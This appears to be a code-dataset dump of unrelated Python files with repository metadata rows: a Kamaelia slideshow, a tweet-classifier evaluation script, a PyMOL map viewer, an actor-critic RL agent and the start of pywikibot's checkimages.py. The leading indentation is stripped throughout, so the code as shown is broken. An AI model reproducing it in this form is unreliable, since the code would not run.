files = [ os.path.join(path,fname) for fname in files if fname[-len(extn):]==extn ]
files.sort()
return files
PrimarySlides = getSlideList(path, extn)
SecondarySlides = getSlideList(path_extra, extn)
class BounceRange(Axon.Component.component):
def __init__(self, start, stop, step=1):
super(BounceRange, self).__init__()
self.start = start
self.stop = stop
self.step = step
def main(self):
while 1:
yield 1
if self.dataReady("inbox"):
message = self.recv("inbox")
if message == "TOGGLE":
last = None
for level in xrange(self.start, self.stop, self.step):
self.send(level, "outbox")
last = level
yield 1
if last != self.stop: # xrange can finish before reaching the end of the range.
self.send(self.stop, "outbox")
yield 1
self.start, self.stop, self.step = self.stop, self.start, -self.step
else:
self.pause()
yield 1
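# Illustrative trace (not in the original file): BounceRange(255, 0, -10) emits
# 255, 245, ..., 5 and then 0 for one "TOGGLE"; start/stop/step are then swapped,
# so the next "TOGGLE" fades back from 0 up to 255.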
print """
Kamaelia: Show - Controls
=========================
General:
Fullscreen: f
Quit : q
Primary Slides:
next slide : <right click>, spacebar
prev slide : <middle click>, backspace
Fade in/out : g
Secondary Slides:
next slide : return
Fade in/out : j
Graph Slides:
next slide : page down
drag blobs : left click
Fade in/out : h
"""
Graphline(
KEYS = KeyEvent(outboxes = { "primaryslidefadesignal" : "Normal place for message",
"graphfadesignal" : "Normal place for message",
"secondaryslidefadesignal" : "Normal place for message",
"graphcontrol" : "Sends a 'next' message to the slide control",
"primaryslidecontrol" : "Keyboard control",
"secondaryslidecontrol" : "Keyboard control",
},
key_events = {
pygame.K_g: ("TOGGLE", "primaryslidefadesignal"), # Toggle Fade
pygame.K_h: ("TOGGLE", "graphfadesignal"), # Toggle Fade
pygame.K_j: ("TOGGLE", "secondaryslidefadesignal"), # Toggle Fade
pygame.K_PAGEDOWN: ("NEXT", "graphcontrol"), # Advance "graph slides"
pygame.K_RETURN: ("NEXT", "secondaryslidecontrol"), # Advance slides
pygame.K_SPACE: ("NEXT", "primaryslidecontrol"), # Advance slides
pygame.K_BACKSPACE: ("PREV", "slidecontrol"), # Advance slides
}),
MOUSECLICKS = Multiclick(caption="", position=(50,50), transparent=True,
msgs = [ "", "", "PREV", "NEXT", "PREV","NEXT" ],
size=(700,500)),
PRIMARYSLIDES = Chooser(items = PrimarySlides),
PRIMARYDISPLAYFADER = BounceRange(255,0, -10), # Initially we want to fade
PRIMARYDISPLAY = Image(size=(800,600),
position=(0,0),
displayExtra={ "transparency" : (255,255,255) },
),
SECONDARYSLIDES = Chooser(items = SecondarySlides),
SECONDARYDISPLAYFADER = BounceRange(255,0, -10), # Initially we want to fade
SECONDARYDISPLAY = Image(size=(800,600),
position=(0,0),
displayExtra={ "transparency" : (255,255,255) },
),
GRAPHSLIDES = Pipeline(
onDemandGraphFileParser_Prefab(GraphsFile),
chunks_to_lines(),
lines_to_tokenlists(),
),
GRAPHFADER = BounceRange(255,0, -10), # Initially we want to fade
GRAPHVIEWER = TopologyViewer(transparency = (255,255,255), showGrid = False, position=(0,0)),
linkages = {
("MOUSECLICKS","outbox"): ("PRIMARYSLIDES","inbox"),
("MOUSECLICKS","signal"): ("PRIMARYSLIDES","control"),
("KEYS", "primaryslidecontrol"): ("PRIMARYSLIDES","inbox"),
("KEYS", "secondaryslidecontrol"): ("SECONDARYSLIDES","inbox"),
("KEYS", "primaryslidefadesignal") : ("PRIMARYDISPLAYFADER", "inbox"),
("KEYS", "secondaryslidefadesignal") : ("SECONDARYDISPLAYFADER", "inbox"),
("KEYS", "graphfadesignal") : ("GRAPHFADER", "inbox"),
("KEYS", "graphcontrol") : ("GRAPHSLIDES", "inbox"),
("SECONDARYDISPLAYFADER", "outbox") : ("SECONDARYDISPLAY", "alphacontrol"),
("PRIMARYDISPLAYFADER", "outbox") : ("PRIMARYDISPLAY", "alphacontrol"),
("GRAPHFADER", "outbox") : ("GRAPHVIEWER", "alphacontrol"),
("SECONDARYSLIDES","outbox"): ("SECONDARYDISPLAY","inbox"),
("SECONDARYSLIDES","signal"): ("SECONDARYDISPLAY","control"),
("PRIMARYSLIDES","outbox"): ("PRIMARYDISPLAY","inbox"),
("PRIMARYSLIDES","signal"): ("PRIMARYDISPLAY","control"),
("GRAPHSLIDES","outbox"): ("GRAPHVIEWER","inbox"),
("GRAPHSLIDES","signal"): ("GRAPHVIEWER","control"),
}
).run()
| 40.076503
| 105
| 0.591083
|
35417c082a86d1a7d1d2dddb190b68d3c9d55b4f
| 2,381
|
py
|
Python
|
src/evaluate.py
|
swapnilpote/Natural-Language-Processing-with-Disaster-Tweets
|
bf4d911dd0b72cc37662e8bb756615a1fb2f1f83
|
[
"MIT"
] | null | null | null |
src/evaluate.py
|
swapnilpote/Natural-Language-Processing-with-Disaster-Tweets
|
bf4d911dd0b72cc37662e8bb756615a1fb2f1f83
|
[
"MIT"
] | null | null | null |
src/evaluate.py
|
swapnilpote/Natural-Language-Processing-with-Disaster-Tweets
|
bf4d911dd0b72cc37662e8bb756615a1fb2f1f83
|
[
"MIT"
] | null | null | null |
import os
import sys
import json
import math
# Data Science imports
import joblib
import pandas as pd
import sklearn.metrics as metrics
if len(sys.argv) != 7:
sys.stderr.write("Arguments error. Usage:\n")
sys.stderr.write("\tpython evaluate.py model prepared features scores prc roc\n")
sys.exit(1)
model_file = sys.argv[1]
in_prep_file = os.path.join(sys.argv[2], "valid.csv")
in_feat_file = os.path.join(sys.argv[3], "valid.pkl")
scores_file = sys.argv[4]
prc_file = sys.argv[5]
roc_file = sys.argv[6]
def model_score(in_prep_path: str, in_feat_path: str, model_file_path: str) -> None:
"""Perform model evaluation on validation/hold out data to check accuracy.
Args:
in_prep_path (str): Prepared data file to extract labels.
in_feat_path (str): Featurized data file to extract numpy array.
model_file_path (str): Model file path.
"""
with open(model_file_path, "rb") as f:
model = joblib.load(f)
with open(in_feat_path, "rb") as f:
X = joblib.load(f)
df = pd.read_csv(in_prep_path)
y = df["target"].values
predictions = model.predict(X)
precision, recall, prc_thresholds = metrics.precision_recall_curve(y, predictions)
fpr, tpr, roc_thresholds = metrics.roc_curve(y, predictions)
avg_prec = metrics.average_precision_score(y, predictions)
roc_auc = metrics.roc_auc_score(y, predictions)
with open(scores_file, "w") as fd:
json.dump({"avg_prec": avg_prec, "roc_auc": roc_auc}, fd, indent=4)
nth_point = math.ceil(len(prc_thresholds) / 1000)
prc_points = list(zip(precision, recall, prc_thresholds))[::nth_point]
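    # Worked example of the downsampling above (illustrative numbers): with 2500
    # thresholds, nth_point = ceil(2500 / 1000) = 3, so the slice keeps every 3rd
    # point, i.e. roughly 834 of the 2500 precision/recall pairs.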
with open(prc_file, "w") as fd:
json.dump(
{
"prc": [
{"precision": float(p), "recall": float(r), "threshold": float(t)}
for p, r, t in prc_points
]
},
fd,
indent=4,
)
with open(roc_file, "w") as fd:
json.dump(
{
"roc": [
{"fpr": float(fp), "tpr": float(tp), "threshold": float(t)}
for fp, tp, t in zip(fpr, tpr, roc_thresholds)
]
},
fd,
indent=4,
)
return None
if __name__ == "__main__":
model_score(in_prep_file, in_feat_file, model_file)
| 28.686747
| 86
| 0.602268
|
aea2a052a500e2fc0462ae1d996c1238f954bfe2
| 2,618
|
py
|
Python
|
cctbx/examples/view_fft_map.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
cctbx/examples/view_fft_map.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
cctbx/examples/view_fft_map.py
|
rimmartin/cctbx_project
|
644090f9432d9afc22cfb542fc3ab78ca8e15e5d
|
[
"BSD-3-Clause-LBNL"
] | null | null | null |
"""
Loads the file map_coeff.pickle (see random_f_calc.py) and displays
the FFT map based on these coefficients in PyMOL. Also computes
and displays a list of peaks in the map.
Usage:
Setup the cctbx environment (e.g. source setpaths.csh) and
launch PyMOL from the command line. Inside PyMOL enter:
run view_fft_map.py
show_fft()
"""
from __future__ import division
print "Loading module:", __name__
# cctbx imports
from cctbx import maptbx
from libtbx import easy_pickle
# PyMOL imports
from chempy.map import Map
from pymol import cmd
from pymol import cgo
def show_map(unit_cell, map_covering_unit_cell, label, level):
map_grid = map_covering_unit_cell.focus()
print "map_grid:", map_grid
ucell_params = unit_cell.parameters()
first = [0,0,0]
last = [map_grid[i] + 1 for i in xrange(3)]
c_obj_map = maptbx.as_CObjectZYX(
map_unit_cell=map_covering_unit_cell,
first=first,
last=last,
apply_sigma_scaling=True)
map=Map()
map.from_c_object(c_obj_map,'CObjectZYXfloat',
ucell_params[0:3], ucell_params[3:6],
list(map_grid), first, last)
cmd.load_map(map, label+"_cell")
print "map loaded into PyMol"
cmd.isomesh(label+"_con", label+"_cell", level) # create mesh
cmd.color('gray', label+"_cell") # color wire frame
cmd.set('auto_zoom', '0') # disable zooming
cmd.set('ortho', '1') # orthoscopic projects
cmd.enable(label+"_cell") # put box around map object
cmd.color('cyan', label+"_con") # color mesh
def show_peaks(unit_cell, clusters, radius=2.0):
go = []
go.extend([cgo.COLOR, 1, 0, 0,])
height0 = None
for site,height in zip(clusters.sites(), clusters.heights()):
print "%8.5f %8.5f %8.5f" % site, height
if (height0 == None): height0 = height
go.extend( [cgo.SPHERE]
+ list(unit_cell.orthogonalize(site))
+ [radius*height/height0])
cmd.load_cgo(go, "peaks")
def show_fft(file="map_coeff.pickle", map_level=3.0):
cmd.delete("all")
map_coeff = easy_pickle.load(file)
map_coeff.show_summary()
fft_map = map_coeff.fft_map(
symmetry_flags=maptbx.use_space_group_symmetry)
print "map gridding:", fft_map.n_real()
show_map(fft_map.unit_cell(), fft_map.real_map(), "fft_map", map_level)
clusters = fft_map.tags().peak_search(
parameters=maptbx.peak_search_parameters(
min_distance_sym_equiv=3.0,
max_clusters=10),
map=fft_map.real_map()).all()
show_peaks(fft_map.unit_cell(), clusters)
cmd.zoom('all', 15.0) # zoom with additional border of 15 Ang.
print
if (__name__ == "pymol"):
cmd.extend("show_fft", show_fft)
| 31.926829
| 73
| 0.698243
|
0059d567259408bd834bd3770c7532f957c7aad6
| 1,051
|
py
|
Python
|
test/test_alert_rule_response.py
|
sematext/sematext-api-client-python
|
16e025cd3d32aa58deb70fc5930ae4165afebe97
|
[
"Apache-2.0"
] | 1
|
2020-05-01T12:15:52.000Z
|
2020-05-01T12:15:52.000Z
|
test/test_alert_rule_response.py
|
sematext/sematext-api-client-python
|
16e025cd3d32aa58deb70fc5930ae4165afebe97
|
[
"Apache-2.0"
] | null | null | null |
test/test_alert_rule_response.py
|
sematext/sematext-api-client-python
|
16e025cd3d32aa58deb70fc5930ae4165afebe97
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Sematext Cloud API
API Explorer provides access and documentation for Sematext REST API. The REST API requires the API Key to be sent as part of `Authorization` header. E.g.: `Authorization : apiKey e5f18450-205a-48eb-8589-7d49edaea813`. # noqa: E501
OpenAPI spec version: v3
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import stcloud
from stcloud.models.alert_rule_response import AlertRuleResponse # noqa: E501
from stcloud.rest import ApiException
class TestAlertRuleResponse(unittest.TestCase):
"""AlertRuleResponse unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testAlertRuleResponse(self):
"""Test AlertRuleResponse"""
# FIXME: construct object with mandatory attributes with example values
# model = stcloud.models.alert_rule_response.AlertRuleResponse() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 26.275
| 236
| 0.717412
|
bc20fdc0e49b57e07802369152a7c9966062cc73
| 88
|
py
|
Python
|
redditclone/posts/apps.py
|
DSanzh/the-ultimate-beginners-guide-to-django
|
2117db3b53334677ea3cf308a94f830cfc223633
|
[
"MIT"
] | null | null | null |
redditclone/posts/apps.py
|
DSanzh/the-ultimate-beginners-guide-to-django
|
2117db3b53334677ea3cf308a94f830cfc223633
|
[
"MIT"
] | null | null | null |
redditclone/posts/apps.py
|
DSanzh/the-ultimate-beginners-guide-to-django
|
2117db3b53334677ea3cf308a94f830cfc223633
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class AccountsConfig(AppConfig):
name = 'posts'
| 14.666667
| 33
| 0.75
|
f0d6cdd955df1bfd79cb2c9ecda618574dd19e99
| 7,281
|
py
|
Python
|
rlzoo/algorithms/ac/ac.py
|
CaltechExperimentalGravity/RLzoo
|
355ed45adf69015643532340affef1c2696dd6db
|
[
"Apache-2.0"
] | null | null | null |
rlzoo/algorithms/ac/ac.py
|
CaltechExperimentalGravity/RLzoo
|
355ed45adf69015643532340affef1c2696dd6db
|
[
"Apache-2.0"
] | null | null | null |
rlzoo/algorithms/ac/ac.py
|
CaltechExperimentalGravity/RLzoo
|
355ed45adf69015643532340affef1c2696dd6db
|
[
"Apache-2.0"
] | null | null | null |
"""
Actor-Critic
-------------
It uses TD-error as the Advantage.
Actor Critic History
----------------------
A3C > DDPG > AC
Advantage
----------
AC converge faster than Policy Gradient.
Disadvantage (IMPORTANT)
------------------------
The Policy is oscillated (difficult to converge), DDPG can solve
this problem using advantage of DQN.
Reference
----------
paper: https://papers.nips.cc/paper/1786-actor-critic-algorithms.pdf
View more on MorvanZhou's tutorial page: https://morvanzhou.github.io/tutorials/
MorvanZhou's code: https://github.com/MorvanZhou/Reinforcement-learning-with-tensorflow/
Environment
------------
CartPole-v0: https://gym.openai.com/envs/CartPole-v0
A pole is attached by an un-actuated joint to a cart, which moves along a
frictionless track. The system is controlled by applying a force of +1 or -1
to the cart. The pendulum starts upright, and the goal is to prevent it from
falling over.
A reward of +1 is provided for every timestep that the pole remains upright.
The episode ends when the pole is more than 15 degrees from vertical, or the
cart moves more than 2.4 units from the center.
Prerequisites
--------------
tensorflow >=2.0.0a0
tensorlayer >=2.0.0
"""
import time
import tensorlayer as tl
from rlzoo.common.utils import *
from rlzoo.common.value_networks import *
from rlzoo.common.policy_networks import *
tl.logging.set_verbosity(tl.logging.DEBUG)
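# Illustrative sketch (not part of the original module): the TD-error computed
# in AC.update() doubles as the advantage used to weight the actor's loss:
#     td_error = r + GAMMA * V(s_new) - V(s)
# e.g. with r = 1.0, GAMMA = 0.9, V(s_new) = 0.5 and V(s) = 0.8 the advantage
# is 1.0 + 0.9 * 0.5 - 0.8 = 0.65, so the sampled action is reinforced.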
############################### Actor-Critic ####################################
class AC:
def __init__(self, net_list, optimizers_list, gamma=0.9):
assert len(net_list) == 2
assert len(optimizers_list) == 2
self.name = 'AC'
self.actor, self.critic = net_list
assert isinstance(self.critic, ValueNetwork)
assert isinstance(self.actor, StochasticPolicyNetwork)
self.a_optimizer, self.c_optimizer = optimizers_list
self.GAMMA = gamma
def update(self, s, a, r, s_):
# critic update
v_ = self.critic(np.array([s_]))
with tf.GradientTape() as tape:
v = self.critic(np.array([s]))
td_error = r + self.GAMMA * v_ - v # TD_error = r + lambd * V(newS) - V(S)
loss = tf.square(td_error)
grad = tape.gradient(loss, self.critic.trainable_weights)
self.c_optimizer.apply_gradients(zip(grad, self.critic.trainable_weights))
# actor update
with tf.GradientTape() as tape:
# _logits = self.actor(np.array([s]))
            ## cross-entropy loss weighted by td-error (advantage),
            # the cross-entropy measures the difference between two probability distributions: the predicted logits and the sampled action distribution,
            # then it is weighted by the td-error: a small difference between real and predicted actions for a large td-error (advantage), and vice versa.
_ = self.actor(np.array([s]))
neg_log_prob = self.actor.policy_dist.neglogp([a])
_exp_v = tf.reduce_mean(neg_log_prob * td_error)
grad = tape.gradient(_exp_v, self.actor.trainable_weights)
self.a_optimizer.apply_gradients(zip(grad, self.actor.trainable_weights))
return _exp_v
def get_action(self, s):
return self.actor(np.array([s]))[0].numpy()
def get_action_greedy(self, s):
return self.actor(np.array([s]), greedy=True)[0].numpy()
def save_ckpt(self, env_name): # save trained weights
save_model(self.actor, 'model_actor', self.name, env_name)
save_model(self.critic, 'model_critic', self.name, env_name)
def load_ckpt(self, env_name): # load trained weights
load_model(self.actor, 'model_actor', self.name, env_name)
load_model(self.critic, 'model_critic', self.name, env_name)
def learn(self, env, train_episodes=1000, test_episodes=500, max_steps=200,
save_interval=100, mode='train', render=False, plot_func=None):
"""
:param env: learning environment
:param train_episodes: total number of episodes for training
:param test_episodes: total number of episodes for testing
:param max_steps: maximum number of steps for one episode
:param save_interval: time steps for saving the weights and plotting the results
:param mode: 'train' or 'test'
:param render: if true, visualize the environment
:param plot_func: additional function for interactive module
"""
t0 = time.time()
if mode == 'train':
print('Training... | Algorithm: {} | Environment: {}'.format(self.name, env.spec.id))
reward_buffer = []
for i_episode in range(train_episodes):
s = env.reset()
ep_rs_sum = 0 # rewards of all steps
for step in range(max_steps):
if render:
env.render()
a = self.get_action(s)
s_new, r, done, info = env.step(a)
ep_rs_sum += r
try:
self.update(s, a, r, s_new) # learn Policy : true_gradient = grad[logPi(s, a) * td_error]
except KeyboardInterrupt: # if Ctrl+C at running actor.learn(), then save model, or exit if not at actor.learn()
self.save_ckpt(env_name=env.spec.id)
plot_save_log(reward_buffer, algorithm_name=self.name, env_name=env.spec.id)
s = s_new
if done:
break
reward_buffer.append(ep_rs_sum)
if plot_func is not None:
plot_func(reward_buffer)
print('Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}' \
.format(i_episode, train_episodes, ep_rs_sum, time.time() - t0))
if i_episode % save_interval == 0:
self.save_ckpt(env_name=env.spec.id)
plot_save_log(reward_buffer, algorithm_name=self.name, env_name=env.spec.id)
self.save_ckpt(env_name=env.spec.id)
plot_save_log(reward_buffer, algorithm_name=self.name, env_name=env.spec.id)
elif mode == 'test':
self.load_ckpt(env_name=env.spec.id)
print('Testing... | Algorithm: {} | Environment: {}'.format(self.name, env.spec.id))
reward_buffer = []
for i_episode in range(test_episodes):
s = env.reset()
ep_rs_sum = 0 # rewards of all steps
for step in range(max_steps):
if render: env.render()
a = self.get_action_greedy(s)
s_new, r, done, info = env.step(a)
ep_rs_sum += r
s = s_new
if done:
break
reward_buffer.append(ep_rs_sum)
if plot_func:
plot_func(reward_buffer)
print('Episode: {}/{} | Episode Reward: {:.4f} | Running Time: {:.4f}'.format(
i_episode, test_episodes, ep_rs_sum, time.time() - t0))
        else:
            print('unknown mode type')
| 38.52381
| 144
| 0.592776
|
cee134e0bb7d5c43705e8267b539fec34bb89346
| 72,913
|
py
|
Python
|
scripts/checkimages.py
|
K-wachira/Outreachywikibot
|
11afd0c42b7e6c8c182f39ef58174adb901ba697
|
[
"MIT"
] | null | null | null |
scripts/checkimages.py
|
K-wachira/Outreachywikibot
|
11afd0c42b7e6c8c182f39ef58174adb901ba697
|
[
"MIT"
] | null | null | null |
scripts/checkimages.py
|
K-wachira/Outreachywikibot
|
11afd0c42b7e6c8c182f39ef58174adb901ba697
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
"""
Script to check recently uploaded files.
This script checks if a file description is present and if there are other
problems in the image's description.
This script will have to be configured for each language. Please submit
translations as addition to the Pywikibot framework.
Everything that needs customisation is indicated by comments.
This script understands the following command-line arguments:
-limit The number of images to check (default: 80)
-commons The Bot will check if an image on Commons has the same name
and if true it reports the image.
-duplicates[:#] Checking if the image has duplicates (if an argument is
given, set how many rollbacks to wait before reporting the image in the
report instead of tagging it) default: 1 rollback.
-duplicatesreport Report the duplicates in a log *AND* put the template in
the images.
-maxusernotify Maximum notifications added to a user talk page in a single
check, to avoid email spamming.
-sendemail Send an email after tagging.
-break To break the bot after the first check (default: recursive)
-sleep[:#] Time in seconds between repeat runs (default: 30)
-wait[:#] Wait x second before check the images (default: 0)
-skip[:#] The bot skips the first [:#] images (default: 0)
-start[:#] Use allimages() as generator
(it starts already from File:[:#])
-cat[:#] Use a category as generator
-regex[:#] Use regex, must be used with -url or -page
-page[:#] Define the name of the wikipage where the images are
-url[:#] Define the url where the images are
-nologerror If given, this option will disable the error that is raised
when the log is full.
Instructions for the real-time settings.
For every new block you have to add:
<------- ------->
In this way the Bot can understand where the block starts in order to take the
right parameter.
* Name= Set the name of the block
* Find= search this text in the image's description
* Findonly= search for exactly this text in the image's description
* Summary= That's the summary that the bot will use when it notifies the
problem.
* Head= That's the incipit that the bot will use for the message.
* Text= This is the template that the bot will use when it reports the
image's problem.
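For reference, a hypothetical block (all values invented for illustration)
that the SETTINGS_REGEX parser below would accept also needs Imagechanges=
and Mex= lines, e.g.:
<------- ------->
*Name='Screenshot'
*Find=screenshot
*Imagechanges=false
*Summary='Bot: possible unlicensed screenshot'
*Head='Screenshot without a license'
*Text='The file [[:File:%s]] looks like a screenshot, please check its license.'
*Mex=default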
Todo
----
* Clean the code, some passages are pretty difficult to understand.
* Add the "catch the language" function for commons.
* Fix and reorganise the new documentation
* Add a report for the image tagged.
"""
#
# (C) Pywikibot team, 2006-2021
#
# Distributed under the terms of the MIT license.
#
import collections
import re
import time
from typing import Generator
import pywikibot
from pywikibot import config, i18n
from pywikibot import pagegenerators as pg
from pywikibot.backports import List, Tuple
from pywikibot.bot import suggest_help
from pywikibot.exceptions import (
EditConflictError,
Error,
IsRedirectPageError,
LockedPageError,
NoPageError,
NotEmailableError,
PageRelatedError,
TranslationError,
)
from pywikibot.family import Family
from pywikibot.site import Namespace
###############################################################################
# <--------------------------- Change only below! --------------------------->#
###############################################################################
# NOTE: in the messages used by the Bot, if you put __botnick__ in the text it
# will automatically be replaced with the bot's nickname.
# That's what will be added (i.e. the {{no source}} with the
# right day/month/year).
n_txt = {
'commons': '{{subst:nld}}',
'meta': '{{No license}}',
'test': '{{No license}}',
'ar': '{{subst:لم}}',
'de': '{{Dateiüberprüfung}}',
'en': '{{subst:nld}}',
'fa': '{{جا:حق تکثیر تصویر نامعلوم}}',
'fr': '{{subst:lid}}',
'ga': '{{subst:Ceadúnas de dhíth}}',
'hr': '{{Bez licence}}',
'hu': '{{nincslicenc|~~~~~}}',
'it': '{{subst:unverdata}}',
'ja': '{{subst:Nld}}',
'ko': '{{subst:nld}}',
'ru': '{{subst:nld}}',
'sd': '{{subst:اجازت نامعلوم}}',
'sr': '{{subst:датотека без лиценце}}',
'ta': '{{subst:nld}}',
'ur': '{{subst:حقوق نسخہ تصویر نامعلوم}}',
'zh': '{{subst:No license/auto}}',
}
# Text that the bot will look for to see whether it is already there or not.
# If there's a {{ a regex is used to make a better check.
# This works like so:
# '{{no license' --> '\{\{(?:template:)?no[ _]license ?(?:\||\n|\}|/) ?' (case
# insensitive).
# If there's no {{ it will work as usual (if x in Text)
txt_find = {
'commons': ['{{no license', '{{no license/en',
'{{nld', '{{no permission', '{{no permission since'],
'meta': ['{{no license', '{{nolicense', '{{nld'],
'test': ['{{no license'],
'ar': ['{{لت', '{{لا ترخيص'],
'de': ['{{DÜP', '{{Düp', '{{Dateiüberprüfung'],
'en': ['{{nld', '{{no license'],
'fa': ['{{حق تکثیر تصویر نامعلوم۲'],
'ga': ['{{Ceadúnas de dhíth', '{{Ceadúnas de dhíth'],
'hr': ['{{bez licence'],
'hu': ['{{nincsforrás', '{{nincslicenc'],
'it': ['{{unverdata', '{{unverified'],
'ja': ['{{no source', '{{unknown',
'{{non free', '<!--削除についての議論が終了するまで'],
'ko': ['{{출처 없음', '{{라이선스 없음', '{{Unknown'],
'ru': ['{{no license'],
'sd': ['{{ناحوالا', '{{ااجازت نامعلوم', '{{Di-no'],
'sr': ['{{датотека без лиценце', '{{датотека без извора'],
'ta': ['{{no source', '{{nld', '{{no license'],
'ur': ['{{ناحوالہ', '{{اجازہ نامعلوم', '{{Di-no'],
'zh': ['{{no source', '{{unknown', '{{No license'],
}
# When the Bot finds that the user talk page is empty, it is not nice to put
# only the no-source notice without a welcome, is it?
empty = {
'commons': '{{subst:welcome}}\n~~~~\n',
'meta': '{{subst:Welcome}}\n~~~~\n',
'ar': '{{ترحيب}}\n~~~~\n',
'de': '{{subst:willkommen}} ~~~~',
'en': '{{welcome}}\n~~~~\n',
'fa': '{{جا:خوشامدید|%s}}',
'fr': '{{Bienvenue nouveau\n~~~~\n',
'ga': '{{subst:Fáilte}} - ~~~~\n',
'hr': '{{subst:dd}}--~~~~\n',
'hu': '{{subst:Üdvözlet|~~~~}}\n',
'it': '<!-- inizio template di benvenuto -->\n{{subst:Benvebot}}\n~~~~\n'
'<!-- fine template di benvenuto -->',
'ja': '{{subst:Welcome/intro}}\n{{subst:welcome|--~~~~}}\n',
'ko': '{{환영}}--~~~~\n',
'ru': '{{subst:Приветствие}}\n~~~~\n',
'sd': '{{ڀليڪار}}\n~~~~\n',
'sr': '{{dd}}--~~~~\n',
'ta': '{{welcome}}\n~~~~\n',
'ur': '{{خوش آمدید}}\n~~~~\n',
'zh': '{{subst:welcome|sign=~~~~}}',
}
# If the file has an unknown extension it will be tagged with this template.
# In reality there are no unknown extensions, they are simply not allowed...
delete_immediately = {
'commons': '{{speedy|The file has .%s as extension. '
'Is it ok? Please check.}}',
'meta': '{{Delete|The file has .%s as extension.}}',
'ar': '{{شطب|الملف له .%s كامتداد.}}',
'en': '{{db-meta|The file has .%s as extension.}}',
'fa': '{{حذف سریع|تصویر %s اضافی است.}}',
'ga': '{{scrios|Tá iarmhír .%s ar an comhad seo.}}',
'hu': '{{azonnali|A fájlnak .%s a kiterjesztése}}',
'it': '{{cancella subito|motivo=Il file ha come estensione ".%s"}}',
'ja': '{{db|知らないファイルフォーマット %s}}',
'ko': '{{delete|잘못된 파일 형식 (.%s)}}',
'ru': '{{db-badimage}}',
'sr': '{{speedy|Ова датотека садржи екстензију %s. '
'Молим вас да проверите да ли је у складу са правилима.}}',
'ta': '{{delete|'
'இந்தக் கோப்பு .%s என்றக் கோப்பு நீட்சியைக் கொண்டுள்ளது.}}',
'ur': '{{سریع حذف شدگی|اس ملف میں .%s بطور توسیع موجود ہے۔ }}',
'zh': '{{delete|未知檔案格式%s}}',
}
# That's the text that the bot will add if it doesn't find the license.
# Note: every __botnick__ will be replaced with your bot's nickname
# (feel free not to use it if you don't need it)
nothing_notification = {
'commons': "\n{{subst:User:Filnik/untagged|File:%s}}\n\n''This message "
"was '''added automatically by ~~~''', if you need "
'some help about it, please read the text above again and '
'follow the links in it, if you still need help ask at the '
'[[File:Human-help-browser.svg|18px|link=Commons:Help desk|?]] '
"'''[[Commons:Help desk|->]][[Commons:Help desk]]''' in any "
"language you like to use.'' --~~~~",
'meta': '{{subst:No license notice|File:%s}}',
'ar': '{{subst:مصدر الصورة|File:%s}} --~~~~',
'en': '{{subst:image source|File:%s}} --~~~~',
'fa': '{{جا:اخطار نگاره|%s}}',
'ga': '{{subst:Foinse na híomhá|File:%s}} --~~~~',
'hu': '{{subst:adjforrást|Kép:%s}}\n Ezt az üzenetet ~~~ automatikusan '
'helyezte el a vitalapodon, kérdéseddel fordulj a gazdájához, vagy '
'a [[WP:KF|Kocsmafalhoz]]. --~~~~',
'it': '{{subst:Progetto:Coordinamento/Immagini/Bot/Messaggi/Senza licenza|'
'%s|~~~}} --~~~~',
'ja': '\n{{subst:Image copyright|File:%s}}--~~~~',
'ko': '\n{{subst:User:Kwjbot IV/untagged|%s}} --~~~~',
'ru': '{{subst:Запрос о статусе файла|Файл:%s}} --~~~~',
'sr': '\n{{subst:Обавештење о датотеци без лиценце|%s}} --~~~~',
'sd': '{{subst:تصوير جو ذريعو|File:%s}}--~~~~',
'ta': '\n{{subst:Di-no license-notice|படிமம்:%s}} ~~~~',
'ur': '{{subst:ماخذ تصویر|File:%s}}--~~~~',
'zh': '\n{{subst:Uploadvionotice|File:%s}} ~~~~',
}
# This is a list of the bots that use this script in your project.
# NOTE: YOUR Bot username will be automatically added.
bot_list = {
'commons': ['Siebot', 'CommonsDelinker', 'Filbot', 'Sz-iwbot',
'ABFbot'],
'meta': ['MABot'],
'de': ['Xqbot'],
'en': ['OrphanBot'],
'fa': ['Amirobot'],
'ga': ['AllieBot'],
'it': ['Filbot', 'Nikbot', '.snoopybot.'],
'ja': ['Alexbot'],
'ko': ['Kwjbot IV'],
'ru': ['Rubinbot'],
'sr': ['KizuleBot'],
'ta': ['TrengarasuBOT'],
'ur': ['Shuaib-bot', 'Tahir-bot', 'SAMI.Bot'],
'zh': ['Alexbot'],
}
# The message that the bot will add the second time it finds another license
# problem.
second_message_without_license = {
'hu': '\nSzia! Úgy tűnik a [[:Kép:%s]] képpel is hasonló a probléma, '
'mint az előbbivel. Kérlek olvasd el a [[WP:KÉPLIC|feltölthető '
'képek]]ről szóló oldalunk, és segítségért fordulj a [[WP:KF-JO|'
'Jogi kocsmafalhoz]]. Köszönöm --~~~~',
'it': ':{{subst:Progetto:Coordinamento/Immagini/Bot/Messaggi/Senza'
'licenza2|%s|~~~}} --~~~~',
}
# You can add some settings to a wiki page. In this way, you can change them
# without touching the code. That's useful if you are running the bot on
# Toolserver.
page_with_settings = {
'commons': 'User:Filbot/Settings',
'it': 'Progetto:Coordinamento/Immagini/Bot/Settings#Settings',
'sr': 'User:KizuleBot/checkimages.py/подешавања',
'zh': 'User:Alexbot/cisettings#Settings',
}
# The bot can report some images (like the images that have the same name as an
# image on Commons). This is the page where the bot will store them.
report_page = {
'commons': 'User:Filbot/Report',
'meta': 'User:MABot/Report',
'test': 'User:Pywikibot-test/Report',
'de': 'Benutzer:Xqbot/Report',
'en': 'User:Filnik/Report',
'fa': 'کاربر:Amirobot/گزارش تصویر',
'ga': 'User:AllieBot/ReportImages',
'hu': 'User:Bdamokos/Report',
'it': 'Progetto:Coordinamento/Immagini/Bot/Report',
'ja': 'User:Alexbot/report',
'ko': 'User:Kwjbot IV/Report',
'ru': 'User:Rubinbot/Report',
'sd': 'واپرائيندڙ:Kaleem Bhatti/درخواست تصوير',
'sr': 'User:KizuleBot/checkimages.py/дневник',
'ta': 'User:Trengarasu/commonsimages',
'ur': 'صارف:محمد شعیب/درخواست تصویر',
